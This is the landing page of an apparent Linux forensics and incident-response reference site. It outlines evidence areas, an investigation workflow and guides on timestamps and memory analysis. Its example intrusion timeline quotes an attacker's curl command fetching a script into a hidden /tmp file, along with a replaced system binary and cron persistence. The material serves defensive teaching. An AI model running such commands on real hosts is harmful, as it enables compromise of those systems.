Skip to content

Linux DFIR field reference

Investigate Linux hosts with confidence.

Where the evidence lives, what it proves and how to collect it without destroying it: logs and the systemd journal, shell history, persistence, ext4 and XFS timestamps, memory, containers and triage.

investigation areas
9
in-depth guides
11
glossary terms
12
super-timeline · web-prod-03UTC
  1. 02:13:07auth.logsshd: Accepted publickey for deploy from 203.0.113.50
  2. 02:13:41bash_historycurl -s http://203.0.113.50/k.sh -o /tmp/.k
  3. 02:14:02ext4 crtime/tmp/.k born · inode 1310722
  4. 02:15:19journalsystemd: Enabled dbus-helper.service
  5. 02:15:20ext4 mtime/usr/bin/ss replaced · dpkg -V: ??5??????
  6. 02:31:55cron(root) CMD (/usr/lib/.cache/upd)
$psort.py -o l2tcsv case.plaso "date > '2026-03-14 02:00:00'"
Illustrative example: a fictional intrusion reconstructed from five artifact sources.

/var/evidence

The Linux forensics map

Nine areas cover the artifacts that matter on a compromised Linux system. Each links to deep guides with commands, tables and pitfalls.

workflow

From first alert to a defensible timeline

The same five phases apply whether you are looking at one cloud VM or a fleet of servers.

  1. 01

    Preserve

    Capture volatile data first: memory, processes, sockets. Snapshot or image disks and record hashes.

  2. 02

    Triage

    Run UAC or a Velociraptor collector to pull logs, history and configuration in minutes.

  3. 03

    Analyse

    Read auth logs, the journal, shell history, persistence locations and package state.

  4. 04

    Correlate

    Merge filesystem, log and memory evidence into one UTC super-timeline and pivot.

  5. 05

    Report

    State what each artifact proves, what it cannot prove, and how you verified it.

~/guides

Latest guides

View all guides
05 · Filesystem & Timestamps

ext4 and XFS Timestamps, Inodes and Deleted Files

How to read MAC and birth timestamps on ext4 and XFS, spot timestomping through ctime, and understand the real limits of deleted file recovery on Linux.

ext4xfstimestamps
06 · Memory Forensics

Linux Memory Forensics with LiME, AVML and Volatility 3

Acquire Linux RAM with LiME or AVML, build Volatility 3 symbol tables with dwarf2json, and find hidden processes, rootkit modules and bash history in memory.

memory-forensicsvolatilitylime